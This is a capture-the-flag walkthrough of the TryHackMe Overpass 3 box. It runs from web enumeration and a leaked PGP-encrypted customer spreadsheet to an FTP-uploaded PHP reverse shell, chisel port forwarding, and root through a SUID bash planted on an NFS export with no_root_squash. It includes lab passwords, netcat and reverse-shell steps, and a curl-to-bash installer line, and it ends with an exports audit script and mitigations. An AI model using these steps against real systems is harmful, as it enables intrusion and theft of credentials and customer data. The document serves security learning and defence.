How I Hacked Into a Hosting Company and Exposed a Vulnerability (THM Overpass 3)


BOX OVERVIEW

PREMISE

This is the third and final installment of the Overpass challenges on TryHackMe. Here are the other two overpass walkthroughs, just in case you missed them:

In today’s challenge, the team of comp-sci students is at it again with a new website hosting company. However, they haven’t learned much yet about security.

We’ll hack into their new site and escalate our privileges to the root user, and show them that they need to make some security upgrades.

ENUMERATION

First, we’ll note down our IPs in export format to use as bash variables.

export targetIP=10.10.232.238
export myIP=10.6.2.23

Let’s also start a regular nmap scan of all ports, and a dirb scan to sniff out web app directories.

The dirb scan found a /backups directory that reveals a backups.zip file.

─[kalisurfer@parrot]─[~]
└──╼ $ dirb http://10.10.232.238

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu Jan  5 11:16:14 2023
URL_BASE: http://10.10.232.238/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.232.238/ ----
==> DIRECTORY: http://10.10.232.238/backups/
+ http://10.10.232.238/cgi-bin/ (CODE:403|SIZE:217)
+ http://10.10.232.238/index.html (CODE:200|SIZE:1770)

---- Entering directory: http://10.10.232.238/backups/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Thu Jan  5 11:23:15 2023
DOWNLOADED: 4612 - FOUND: 2

After unzipping the backups.zip file, we have two files: 

priv.key 
CustomerDetails.xlsx.pgp

Let’s move ahead and import the priv.key file into gpg, then use it to decrypt the spreadsheet:

gpg --import priv.key
gpg --output CustomerDetails.xlsx --decrypt CustomerDetails.xlsx.pgp

And now there is a third file: CustomerDetails.xlsx

This file is a spreadsheet with customer data including username/passwords and credit card numbers! Let’s record the passwords in our notes.txt file for later reference.

username:password
paradox    ShibesAreGreat123
0day    OllieIsTheBestDog
muirlandoracle    A11D0gsAreAw3s0me

The nmap scan shows a few ports open: An FTP service running on port 21, SSH on 22, HTTP on 80.

The FTP server may allow anonymous login. We’ll test that out soon. First, we’ll drill in a bit more on the open ports with a second nmap scan:

WALKING THE WEBSITE

There’s not much of use on the website running on port 80. Nothing stands out in the text on the site except the potential usernames and hobbies:

Paradox - Our lead web designer, Paradox can help you create your dream website from the ground up
Elf - Overpass' newest intern, Elf. Elf helps maintain the webservers day to day to keep your site running smoothly and quickly.
MuirlandOracle - HTTPS and networking specialist. Muir's many years of experience and enthusiasm for networking keeps Overpass running, and your sites, online all of the time.
NinjaJc01 - James started Overpass, and keeps the business side running. If you have pricing questions or want to discuss how Overpass can help your business, reach out to him!

A quick look through the source code and the developer mode doesn’t reveal anything more here. 

CONNECTING WITH FTP

We test out connecting to the FTP service as user paradox with the command:

lftp -u paradox $targetIP
password=ShibesAreGreat123 (from the xlsx spreadsheet)

We are connected and can see a bunch of files and a directory for backups.

Now that we are connected to the web hosting service, we can upload a payload to spawn a reverse shell to give us an initial foothold into the box. 

CRAFTING A REVERSE SHELL PAYLOAD

We’ll use the pentest monkey PHP reverse shell from revshells.com. This is a good choice because the web server executes a PHP file server-side as soon as it is requested, so simply browsing to the uploaded file runs the payload. I’ve also used this payload successfully before on another box.

Let’s go ahead and copy the PHP reverse shell, add our lhost and lport to the file, and save the revshell as rev.php. I’ll use port 8888.

UPLOADING THE PAYLOAD WITH FTP

Let’s use the terminal window still connected to the FTP service to upload the rev.php file with the command:

put rev.php

And now, the file is in position and ready to use.

SPINNING UP A NETCAT LISTENER TO CATCH A REVSHELL

nc -lvnp 8888

Next we’ll navigate in our browser to $targetIP/rev.php (the file we just uploaded).

At this point, our netcat listener catches the revshell and we now have an initial foothold as user apache!!

Let’s search for the web.flag file with the following command:

find / -type f -name web.flag 2>/dev/null

The last part of this command (2>/dev/null) redirects standard error (file descriptor 2) to /dev/null, the kernel’s discard device, so the many "Permission denied" messages from directories we can’t read don’t clutter the output.

And we’ve found it!

/usr/share/httpd/web.flag

STABILIZE A REVSHELL

We can use a Python one-liner to stabilize the shell enough to be able to switch users.

python3 -c 'import pty;pty.spawn("/bin/bash")'

Now we can do a lateral move over to paradox’s account with the password from the spreadsheet.

su paradox

RUNNING LINPEAS ON THE TARGET MACHINE

The most interesting finding of linpeas is:

╔══════════╣ Analyzing NFS Exports Files (limit 70)
-rw-r--r--. 1 root root 54 Nov 18  2020 /etc/exports
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)

no_root_squash is a misconfiguration: normally the NFS server maps a client’s root user to the unprivileged nobody user (root squashing), but with this option a client that mounts the export as root keeps uid 0 on the server’s filesystem. Combined with rw and the wildcard host (*), anyone who can reach the NFS port can write root-owned files, including SUID binaries, into the export.

We can see that the export is James’ home folder. So now our attack vector is becoming clearer: we will look for a way to escalate privileges through James’ account.
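As an added defender-side check (not from the original post and not part of linpeas), the following Python script parses an exports(5) file and flags the combination found above: no_root_squash, insecure, a wildcard host, and whether the export is writable. The /home/james line is the one from the box; the other sample lines are constructed to show a safe entry and a mixed one.

```python
"""Audit an exports(5) file for the NFS settings that made this box exploitable.

Constructed sample input below; the first line is the export linpeas reported
on the target, the rest are made up to show safe and mixed entries.
"""
import re
import sys
from typing import Dict, List

SAMPLE_EXPORTS = """\
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
/srv/share 10.0.0.0/24(ro,sync,root_squash) 10.0.0.5(rw,sync)
# comment line (ignored)
/data   backup01.example.test(rw,sync,no_subtree_check,no_root_squash)
"""

# Options worth flagging, with the reason a defender cares about each one.
RISKY_OPTIONS = {
    "no_root_squash": "root on a client keeps uid 0 on the export, so it can plant root-owned SUID files",
    "insecure": "requests from unprivileged source ports are accepted, so any local user on a client can speak to the server",
}

# Matches host(opt,opt,...) or a bare host (bare hosts get the defaults: ro, secure, root_squash).
_CLIENT_RE = re.compile(r"(\S+?)\(([^)]*)\)|(\S+)")


def parse_exports(text: str) -> List[Dict]:
    """Return one dict per export line: {'path': str, 'clients': [{'host': str, 'options': [str]}]}."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # strip comments and skip blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        path, rest = parts[0], (parts[1] if len(parts) > 1 else "")
        clients = []
        for m in _CLIENT_RE.finditer(rest):
            host = m.group(1) if m.group(1) is not None else m.group(3)
            opts = m.group(2) or ""
            options = [o.strip() for o in opts.split(",") if o.strip()]
            clients.append({"host": host, "options": options})
        entries.append({"path": path, "clients": clients})
    return entries


def audit_exports(text: str) -> List[Dict]:
    """Flag every client entry that carries a risky option or a wildcard host."""
    findings = []
    for entry in parse_exports(text):
        for client in entry["clients"]:
            opts = client["options"]
            issues = [f"{opt}: {why}" for opt, why in RISKY_OPTIONS.items() if opt in opts]
            if client["host"] == "*":
                issues.append("wildcard host: anything that can reach the NFS port may mount this export")
            if not issues:
                continue
            # A writable export with no_root_squash is exactly the combination abused on this box.
            if "no_root_squash" in opts and "rw" in opts:
                severity = "critical"
            elif "no_root_squash" in opts:
                severity = "high"
            else:
                severity = "medium"
            findings.append({"path": entry["path"], "host": client["host"],
                             "severity": severity, "issues": issues})
    return findings


if __name__ == "__main__":
    # Pass a real exports file as the first argument, otherwise audit the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_EXPORTS
    for f in audit_exports(text):
        print(f"[{f['severity'].upper()}] {f['path']} exported to {f['host']}")
        for issue in f["issues"]:
            print(f"    - {issue}")
```

Run it against /etc/exports on a server to get one finding per risky client entry; the box’s entry comes back as critical, while the same export rewritten as `/home/james 10.10.0.0/24(rw,fsid=0,sync,root_squash)` (a constructed fixed version) produces no findings at all.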

BECOMING PARADOX

After stabilizing the revshell we can try a lateral move and switch users to paradox:

su paradox
Password: ShibesAreGreat123

EXPLOITING NFS WITH NO_ROOT_SQUASH

Following up now on the linpeas results, let’s investigate this NFS service a bit more. Nothing showed up in the nmap scan, but it did in the linpeas results so my hunch is that the service is firewalled from the outside.

This isn’t a problem to work around, but we need to determine the port that the service is operating on. With the following command on the target machine we can find the port:

rpcinfo -p | grep nfs

We can see in the output that NFS is running on port 2049. We’ll use chisel, a TCP tunnelling tool that wraps its connection in SSH, to forward the firewalled port to our attack machine.

USING CHISEL TO PORT FORWARD

We’ll need to grab chisel from the GitHub page. There are a few ways to install it from the repo. I chose to use the one-liner:

curl https://i.jpillora.com/chisel! | bash

Once installed, I copied the chisel bin file over to the target machine. To get this done, we’ll spin up a simple HTTP server using Python, and then curl the file from the target machine.

Now that chisel is on both machines, let’s create the secure SSH tunnel with the following commands to set up port forwarding on the NFS service running on port 2049, but firewalled to the public.

From the attack box:

chisel server -p 7777 --reverse -v

From victim box:

./chisel client 10.6.2.23:7777 R:2049:127.0.0.1:2049 &

The & at the end of the command tells bash to run the chisel client as a background job so the shell stays usable.

BECOMING JAMES

Now let’s check whether the NFS server has any mountable directories. Note that the only thing chisel forwards is port 2049; showmount talks to rpcbind and mountd, which are not part of the tunnel, so through the forward it will usually not get an answer:

showmount -e 127.0.0.1

The reliable way is to read the export table on the target itself:

cat /etc/exports

Now let’s mount the export through the forwarded port onto the folder /mount (which already exists on my machine). Because the export carries fsid=0, it is the NFSv4 root and is addressed as /:

sudo mount -t nfs 127.0.0.1:/ /mount

The user.flag is right there in the /home/james directory! Checking for hidden files and directories with “ls -la” reveals a hidden directory (.ssh). Inside this directory we’ve found an ssh key.

Let’s copy this key over to our machine so that we can ssh directly into James’ account without needing their password.

GAINING ROOT PRIVILEGES WITH A SUID BASH

From James’ account, together with root access to his home directory through the NFS mount, we can create a SUID copy of bash and run it in privileged mode (bash -p), which keeps the elevated effective user id instead of dropping it. Let’s first copy /bin/bash into James’ home directory:

On target box:

cp /bin/bash .

Then set the execute and SUID bits on it from our mounted NFS folder on the attack box:

chmod +xs bash

Last, but not least, let’s run it in privileged mode from the target box:

./bash -p

And we are now root! Let’s grab the root.txt in /root/root.txt.

RECOMMENDED MITIGATION STEPS

  1. Remove no_root_squash (and insecure) from the /etc/exports entry so the default root_squash applies, and export to specific hosts instead of *.
  2. Change permissions on all parts of the website that are not intended to be seen by the public, and disable directory listing. This includes the /backups folder: a private PGP key and customer data should never sit under the web root.
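As an added illustration of the second point (not from the original post and not the box’s actual configuration), here is a hypothetical Apache httpd 2.4 snippet that turns off directory indexes for the document root and denies the backups directory outright; the config file name and the /var/www/html path are assumed:

```apache
# Hypothetical /etc/httpd/conf.d/overpass.conf (paths assumed for the example)

<Directory "/var/www/html">
    # Weak setting that produced the listable /backups/ directory:
    #   Options Indexes FollowSymLinks
    # Hardened: no auto-generated listings for any directory without an index file
    Options -Indexes +FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>

# Backups do not belong under the web root at all; until they are moved,
# refuse every request for them.
<Directory "/var/www/html/backups">
    Require all denied
</Directory>
```

After reloading httpd, a request for /backups/ returns 403 instead of a listing, and the long-term fix is to move the archive (and the private key inside it) out of the document root entirely.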
